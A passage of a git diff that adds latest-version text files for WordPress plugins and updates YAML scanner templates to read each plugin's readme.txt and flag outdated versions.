technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.txt create mode 100644 technologies/wordpress/wordpress-amp.txt create mode 100644 technologies/wordpress/wordpress-antispam-bee.txt create mode 100644 technologies/wordpress/wordpress-astra-sites.txt create mode 100644 technologies/wordpress/wordpress-astra-widgets.txt create mode 100644 technologies/wordpress/wordpress-autoptimize.txt create mode 100644 technologies/wordpress/wordpress-backwpup.txt create mode 100644 technologies/wordpress/wordpress-better-search-replace.txt create mode 100644 technologies/wordpress/wordpress-better-wp-security.txt create mode 100644 technologies/wordpress/wordpress-black-studio-tinymce-widget.txt create mode 100644 technologies/wordpress/wordpress-breadcrumb-navxt.txt create mode 100644 technologies/wordpress/wordpress-broken-link-checker.txt create mode 100644 technologies/wordpress/wordpress-child-theme-configurator.txt create mode 100644 technologies/wordpress/wordpress-classic-editor.txt create mode 100644 technologies/wordpress/wordpress-classic-widgets.txt create mode 100644 technologies/wordpress/wordpress-click-to-chat-for-whatsapp.txt create mode 100644 technologies/wordpress/wordpress-cloudflare.txt create mode 100644 technologies/wordpress/wordpress-cmb2.txt create mode 100644 technologies/wordpress/wordpress-coblocks.txt create mode 100644 technologies/wordpress/wordpress-code-snippets.txt create mode 100644 technologies/wordpress/wordpress-coming-soon.txt create mode 100644 technologies/wordpress/wordpress-complianz-gdpr.txt create mode 100644 technologies/wordpress/wordpress-contact-form-7-honeypot.txt create mode 100644 technologies/wordpress/wordpress-contact-form-7.txt create mode 100644 technologies/wordpress/wordpress-contact-form-cfdb7.txt create mode 100644 technologies/wordpress/wordpress-cookie-law-info.txt create mode 100644 technologies/wordpress/wordpress-cookie-notice.txt create mode 100644 technologies/wordpress/wordpress-creame-whatsapp-me.txt create mode 100644 technologies/wordpress/wordpress-creative-mail-by-constant-contact.txt create mode 100644 technologies/wordpress/wordpress-custom-css-js.txt create mode 100644 technologies/wordpress/wordpress-custom-fonts.txt create mode 100644 technologies/wordpress/wordpress-custom-post-type-ui.txt create mode 100644 technologies/wordpress/wordpress-disable-comments.txt create mode 100644 technologies/wordpress/wordpress-disable-gutenberg.txt create mode 100644 technologies/wordpress/wordpress-duplicate-page.txt create mode 100644 technologies/wordpress/wordpress-duplicate-post.txt create mode 100644 technologies/wordpress/wordpress-duplicator.txt create mode 100644 technologies/wordpress/wordpress-duracelltomi-google-tag-manager.txt create mode 100644 technologies/wordpress/wordpress-easy-fancybox.txt create mode 100644 technologies/wordpress/wordpress-easy-google-fonts.txt create mode 100644 technologies/wordpress/wordpress-easy-table-of-contents.txt create mode 100644 technologies/wordpress/wordpress-easy-wp-smtp.txt create mode 100644 technologies/wordpress/wordpress-elementor.txt create mode 100644 technologies/wordpress/wordpress-elementskit-lite.txt create mode 100644 technologies/wordpress/wordpress-enable-media-replace.txt create mode 100644 technologies/wordpress/wordpress-envato-elements.txt create mode 100644 technologies/wordpress/wordpress-essential-addons-for-elementor-lite.txt create mode 100644 technologies/wordpress/wordpress-ewww-image-optimizer.txt create mode 100644 technologies/wordpress/wordpress-facebook-for-woocommerce.txt create mode 100644 technologies/wordpress/wordpress-favicon-by-realfavicongenerator.txt create mode 100644 technologies/wordpress/wordpress-flamingo.txt create mode 100644 technologies/wordpress/wordpress-fluentform.txt create mode 100644 technologies/wordpress/wordpress-font-awesome.txt create mode 100644 technologies/wordpress/wordpress-force-regenerate-thumbnails.txt create mode 100644 technologies/wordpress/wordpress-formidable.txt create mode 100644 technologies/wordpress/wordpress-forminator.txt create mode 100644 technologies/wordpress/wordpress-ga-google-analytics.txt create mode 100644 technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.txt create mode 100644 technologies/wordpress/wordpress-google-analytics-for-wordpress.txt create mode 100644 technologies/wordpress/wordpress-google-listings-and-ads.txt create mode 100644 technologies/wordpress/wordpress-google-site-kit.txt create mode 100644 technologies/wordpress/wordpress-google-sitemap-generator.txt create mode 100644 technologies/wordpress/wordpress-gtranslate.txt create mode 100644 technologies/wordpress/wordpress-gutenberg.txt create mode 100644 technologies/wordpress/wordpress-happy-elementor-addons.txt create mode 100644 technologies/wordpress/wordpress-header-and-footer-scripts.txt create mode 100644 technologies/wordpress/wordpress-header-footer-code-manager.txt create mode 100644 technologies/wordpress/wordpress-header-footer-elementor.txt create mode 100644 technologies/wordpress/wordpress-header-footer.txt create mode 100644 technologies/wordpress/wordpress-health-check.txt create mode 100644 technologies/wordpress/wordpress-hello-dolly.txt create mode 100644 technologies/wordpress/wordpress-imagify.txt create mode 100644 technologies/wordpress/wordpress-imsanity.txt create mode 100644 technologies/wordpress/wordpress-insert-headers-and-footers.txt create mode 100644 technologies/wordpress/wordpress-instagram-feed.txt create mode 100644 technologies/wordpress/wordpress-intuitive-custom-post-order.txt create mode 100644 technologies/wordpress/wordpress-iwp-client.txt create mode 100644 technologies/wordpress/wordpress-jetpack.txt create mode 100644 technologies/wordpress/wordpress-kadence-blocks.txt create mode 100644 technologies/wordpress/wordpress-kirki.txt create mode 100644 technologies/wordpress/wordpress-leadin.txt create mode 100644 technologies/wordpress/wordpress-limit-login-attempts-reloaded.txt create mode 100644 technologies/wordpress/wordpress-limit-login-attempts.txt create mode 100644 technologies/wordpress/wordpress-litespeed-cache.txt create mode 100644 technologies/wordpress/wordpress-loco-translate.txt create mode 100644 technologies/wordpress/wordpress-loginizer.txt create mode 100644 technologies/wordpress/wordpress-loginpress.txt create mode 100644 technologies/wordpress/wordpress-mailchimp-for-woocommerce.txt create mode 100644 technologies/wordpress/wordpress-mailchimp-for-wp.txt create mode 100644 technologies/wordpress/wordpress-mailpoet.txt create mode 100644 technologies/wordpress/wordpress-maintenance.txt create mode 100644 technologies/wordpress/wordpress-mainwp-child.txt create mode 100644 technologies/wordpress/wordpress-malcare-security.txt create mode 100644 technologies/wordpress/wordpress-megamenu.txt create mode 100644 technologies/wordpress/wordpress-members.txt create mode 100644 technologies/wordpress/wordpress-meta-box.txt create mode 100644 technologies/wordpress/wordpress-ml-slider.txt create mode 100644 technologies/wordpress/wordpress-newsletter.txt create mode 100644 technologies/wordpress/wordpress-nextend-facebook-connect.txt create mode 100644 technologies/wordpress/wordpress-nextgen-gallery.txt create mode 100644 technologies/wordpress/wordpress-ninja-forms.txt create mode 100644 technologies/wordpress/wordpress-ocean-extra.txt create mode 100644 technologies/wordpress/wordpress-official-facebook-pixel.txt create mode 100644 technologies/wordpress/wordpress-one-click-demo-import.txt create mode 100644 technologies/wordpress/wordpress-optinmonster.txt create mode 100644 technologies/wordpress/wordpress-password-protected.txt create mode 100644 technologies/wordpress/wordpress-pdf-embedder.txt create mode 100644 technologies/wordpress/wordpress-photo-gallery.txt create mode 100644 technologies/wordpress/wordpress-php-compatibility-checker.txt create mode 100644 technologies/wordpress/wordpress-pixelyoursite.txt create mode 100644 technologies/wordpress/wordpress-polylang.txt create mode 100644 technologies/wordpress/wordpress-popup-builder.txt create mode 100644 technologies/wordpress/wordpress-popup-maker.txt create mode 100644 technologies/wordpress/wordpress-post-duplicator.txt create mode 100644 technologies/wordpress/wordpress-post-smtp.txt create mode 100644 technologies/wordpress/wordpress-post-types-order.txt create mode 100644 technologies/wordpress/wordpress-premium-addons-for-elementor.txt create mode 100644 technologies/wordpress/wordpress-pretty-link.txt create mode 100644 technologies/wordpress/wordpress-really-simple-captcha.txt create mode 100644 technologies/wordpress/wordpress-really-simple-ssl.txt create mode 100644 technologies/wordpress/wordpress-redirection.txt create mode 100644 technologies/wordpress/wordpress-redux-framework.txt create mode 100644 technologies/wordpress/wordpress-regenerate-thumbnails.txt create mode 100644 technologies/wordpress/wordpress-safe-svg.txt create mode 100644 technologies/wordpress/wordpress-seo-by-rank-math.txt create mode 100644 technologies/wordpress/wordpress-sg-cachepress.txt create mode 100644 technologies/wordpress/wordpress-sg-security.txt create mode 100644 technologies/wordpress/wordpress-shortcodes-ultimate.txt create mode 100644 technologies/wordpress/wordpress-shortpixel-image-optimiser.txt create mode 100644 technologies/wordpress/wordpress-simple-custom-post-order.txt create mode 100644 technologies/wordpress/wordpress-simple-page-ordering.txt create mode 100644 technologies/wordpress/wordpress-siteguard.txt create mode 100644 technologies/wordpress/wordpress-siteorigin-panels.txt create mode 100644 technologies/wordpress/wordpress-smart-slider-3.txt create mode 100644 technologies/wordpress/wordpress-so-widgets-bundle.txt create mode 100644 technologies/wordpress/wordpress-ssl-insecure-content-fixer.txt create mode 100644 technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.txt create mode 100644 technologies/wordpress/wordpress-sucuri-scanner.txt create mode 100644 technologies/wordpress/wordpress-svg-support.txt create mode 100644 technologies/wordpress/wordpress-table-of-contents-plus.txt create mode 100644 technologies/wordpress/wordpress-tablepress.txt create mode 100644 technologies/wordpress/wordpress-taxonomy-terms-order.txt create mode 100644 technologies/wordpress/wordpress-the-events-calendar.txt create mode 100644 technologies/wordpress/wordpress-themeisle-companion.txt create mode 100644 technologies/wordpress/wordpress-tinymce-advanced.txt create mode 100644 technologies/wordpress/wordpress-translatepress-multilingual.txt create mode 100644 technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.txt create mode 100644 technologies/wordpress/wordpress-under-construction-page.txt create mode 100644 technologies/wordpress/wordpress-unyson.txt create mode 100644 technologies/wordpress/wordpress-updraftplus.txt create mode 100644 technologies/wordpress/wordpress-use-any-font.txt create mode 100644 technologies/wordpress/wordpress-user-role-editor.txt create mode 100644 technologies/wordpress/wordpress-velvet-blues-update-urls.txt create mode 100644 technologies/wordpress/wordpress-w3-total-cache.txt create mode 100644 technologies/wordpress/wordpress-widget-importer-exporter.txt create mode 100644 technologies/wordpress/wordpress-woo-cart-abandonment-recovery.txt create mode 100644 technologies/wordpress/wordpress-woo-checkout-field-editor-pro.txt create mode 100644 technologies/wordpress/wordpress-woo-variation-swatches.txt create mode 100644 technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.txt create mode 100644 technologies/wordpress/wordpress-woocommerce-gateway-stripe.txt create mode 100644 technologies/wordpress/wordpress-woocommerce-payments.txt create mode 100644 technologies/wordpress/wordpress-woocommerce-paypal-payments.txt create mode 100644 technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.txt create mode 100644 technologies/wordpress/wordpress-woocommerce-services.txt create mode 100644 technologies/wordpress/wordpress-woocommerce.txt create mode 100644 technologies/wordpress/wordpress-woosidebars.txt create mode 100644 technologies/wordpress/wordpress-wordfence.txt create mode 100644 technologies/wordpress/wordpress-wordpress-importer.txt create mode 100644 technologies/wordpress/wordpress-wordpress-seo.txt create mode 100644 technologies/wordpress/wordpress-worker.txt create mode 100644 technologies/wordpress/wordpress-wp-fastest-cache.txt create mode 100644 technologies/wordpress/wordpress-wp-file-manager.txt create mode 100644 technologies/wordpress/wordpress-wp-google-maps.txt create mode 100644 technologies/wordpress/wordpress-wp-mail-smtp.txt create mode 100644 technologies/wordpress/wordpress-wp-maintenance-mode.txt create mode 100644 technologies/wordpress/wordpress-wp-migrate-db.txt create mode 100644 technologies/wordpress/wordpress-wp-multibyte-patch.txt create mode 100644 technologies/wordpress/wordpress-wp-optimize.txt create mode 100644 technologies/wordpress/wordpress-wp-pagenavi.txt create mode 100644 technologies/wordpress/wordpress-wp-reset.txt create mode 100644 technologies/wordpress/wordpress-wp-sitemap-page.txt create mode 100644 technologies/wordpress/wordpress-wp-smushit.txt create mode 100644 technologies/wordpress/wordpress-wp-statistics.txt create mode 100644 technologies/wordpress/wordpress-wp-super-cache.txt create mode 100644 technologies/wordpress/wordpress-wp-user-avatar.txt create mode 100644 technologies/wordpress/wordpress-wpcf7-recaptcha.txt create mode 100644 technologies/wordpress/wordpress-wpcf7-redirect.txt create mode 100644 technologies/wordpress/wordpress-wpforms-lite.txt create mode 100644 technologies/wordpress/wordpress-wps-hide-login.txt create mode 100644 technologies/wordpress/wordpress-yith-woocommerce-compare.txt create mode 100644 technologies/wordpress/wordpress-yith-woocommerce-wishlist.txt diff --git a/technologies/wordpress/wordpress-ad-inserter.txt b/technologies/wordpress/wordpress-ad-inserter.txt new file mode 100644 index 0000000000..af14db8ef5 --- /dev/null +++ b/technologies/wordpress/wordpress-ad-inserter.txt @@ -0,0 +1 @@ +2.7.22 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-ad-inserter.yaml b/technologies/wordpress/wordpress-ad-inserter.yaml index dac4bde57a..3a23dc3176 100644 --- a/technologies/wordpress/wordpress-ad-inserter.yaml +++ b/technologies/wordpress/wordpress-ad-inserter.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ad-inserter/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-ad-inserter.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-add-to-any.txt b/technologies/wordpress/wordpress-add-to-any.txt new file mode 100644 index 0000000000..44c2012635 --- /dev/null +++ b/technologies/wordpress/wordpress-add-to-any.txt @@ -0,0 +1 @@ +N/A \ No newline at end of file diff --git a/technologies/wordpress/wordpress-add-to-any.yaml b/technologies/wordpress/wordpress-add-to-any.yaml index 3d176504e2..2fbfdf7652 100644 --- a/technologies/wordpress/wordpress-add-to-any.yaml +++ b/technologies/wordpress/wordpress-add-to-any.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/add-to-any/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-add-to-any.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-admin-menu-editor.txt b/technologies/wordpress/wordpress-admin-menu-editor.txt new file mode 100644 index 0000000000..5a68790efc --- /dev/null +++ b/technologies/wordpress/wordpress-admin-menu-editor.txt @@ -0,0 +1 @@ +1.10.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-admin-menu-editor.yaml b/technologies/wordpress/wordpress-admin-menu-editor.yaml index 0fa802315f..643dc6f239 100644 --- a/technologies/wordpress/wordpress-admin-menu-editor.yaml +++ b/technologies/wordpress/wordpress-admin-menu-editor.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/admin-menu-editor/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-admin-menu-editor.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-adminimize.txt b/technologies/wordpress/wordpress-adminimize.txt new file mode 100644 index 0000000000..cd97a5e32b --- /dev/null +++ b/technologies/wordpress/wordpress-adminimize.txt @@ -0,0 +1 @@ +1.11.8 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-adminimize.yaml b/technologies/wordpress/wordpress-adminimize.yaml index cfd20a8b88..9ccbe577bb 100644 --- a/technologies/wordpress/wordpress-adminimize.yaml +++ b/technologies/wordpress/wordpress-adminimize.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/adminimize/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-adminimize.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-advanced-custom-fields.txt b/technologies/wordpress/wordpress-advanced-custom-fields.txt new file mode 100644 index 0000000000..81f0c273ca --- /dev/null +++ b/technologies/wordpress/wordpress-advanced-custom-fields.txt @@ -0,0 +1 @@ +6.0.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-advanced-custom-fields.yaml b/technologies/wordpress/wordpress-advanced-custom-fields.yaml index b47cd4f8c4..083d9c8d16 100644 --- a/technologies/wordpress/wordpress-advanced-custom-fields.yaml +++ b/technologies/wordpress/wordpress-advanced-custom-fields.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-advanced-custom-fields.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-akismet.txt b/technologies/wordpress/wordpress-akismet.txt new file mode 100644 index 0000000000..3e827a3a10 --- /dev/null +++ b/technologies/wordpress/wordpress-akismet.txt @@ -0,0 +1 @@ +5.0.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-akismet.yaml b/technologies/wordpress/wordpress-akismet.yaml index e199d46034..c6a9fac1bd 100644 --- a/technologies/wordpress/wordpress-akismet.yaml +++ b/technologies/wordpress/wordpress-akismet.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/akismet/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-akismet.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-all-404-redirect-to-homepage.txt b/technologies/wordpress/wordpress-all-404-redirect-to-homepage.txt new file mode 100644 index 0000000000..98fccd6d02 --- /dev/null +++ b/technologies/wordpress/wordpress-all-404-redirect-to-homepage.txt @@ -0,0 +1 @@ +3.8 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml b/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml index 890d66c218..97b4c25c37 100644 --- a/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml +++ b/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-all-404-redirect-to-homepage.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-all-in-one-seo-pack.txt b/technologies/wordpress/wordpress-all-in-one-seo-pack.txt new file mode 100644 index 0000000000..bfbcc84cec --- /dev/null +++ b/technologies/wordpress/wordpress-all-in-one-seo-pack.txt @@ -0,0 +1 @@ +4.2.7.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml b/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml index dd9a920b47..919bd3ccb6 100644 --- a/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml +++ b/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-all-in-one-seo-pack.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-all-in-one-wp-migration.txt b/technologies/wordpress/wordpress-all-in-one-wp-migration.txt new file mode 100644 index 0000000000..7045c5d9ec --- /dev/null +++ b/technologies/wordpress/wordpress-all-in-one-wp-migration.txt @@ -0,0 +1 @@ +7.68 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml b/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml index 4ced1376aa..0fbac4b4c3 100644 --- a/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml +++ b/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-all-in-one-wp-migration.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.txt b/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.txt new file mode 100644 index 0000000000..3bff059174 --- /dev/null +++ b/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.txt @@ -0,0 +1 @@ +5.1.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml b/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml index 21c69ea3ec..0c66d581e2 100644 --- a/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml +++ b/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-all-in-one-wp-security-and-firewall.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-amp.txt b/technologies/wordpress/wordpress-amp.txt new file mode 100644 index 0000000000..cc6612c36e --- /dev/null +++ b/technologies/wordpress/wordpress-amp.txt @@ -0,0 +1 @@ +2.3.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-amp.yaml b/technologies/wordpress/wordpress-amp.yaml index a24d8cb1bd..72a216a56c 100644 --- a/technologies/wordpress/wordpress-amp.yaml +++ b/technologies/wordpress/wordpress-amp.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/amp/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-amp.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-antispam-bee.txt b/technologies/wordpress/wordpress-antispam-bee.txt new file mode 100644 index 0000000000..c200bec4af --- /dev/null +++ b/technologies/wordpress/wordpress-antispam-bee.txt @@ -0,0 +1 @@ +2.11.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-antispam-bee.yaml b/technologies/wordpress/wordpress-antispam-bee.yaml index d3843b4eb2..22a782ab51 100644 --- a/technologies/wordpress/wordpress-antispam-bee.yaml +++ b/technologies/wordpress/wordpress-antispam-bee.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/antispam-bee/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-antispam-bee.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-astra-sites.txt b/technologies/wordpress/wordpress-astra-sites.txt new file mode 100644 index 0000000000..3ce1e64bb1 --- /dev/null +++ b/technologies/wordpress/wordpress-astra-sites.txt @@ -0,0 +1 @@ +3.1.18 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-astra-sites.yaml b/technologies/wordpress/wordpress-astra-sites.yaml index e315fde1c1..6ea71f8176 100644 --- a/technologies/wordpress/wordpress-astra-sites.yaml +++ b/technologies/wordpress/wordpress-astra-sites.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/astra-sites/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-astra-sites.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-astra-widgets.txt b/technologies/wordpress/wordpress-astra-widgets.txt new file mode 100644 index 0000000000..67eb68059b --- /dev/null +++ b/technologies/wordpress/wordpress-astra-widgets.txt @@ -0,0 +1 @@ +1.2.12 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-astra-widgets.yaml b/technologies/wordpress/wordpress-astra-widgets.yaml index 31b65bad53..35aeedd890 100644 --- a/technologies/wordpress/wordpress-astra-widgets.yaml +++ b/technologies/wordpress/wordpress-astra-widgets.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/astra-widgets/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-astra-widgets.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + 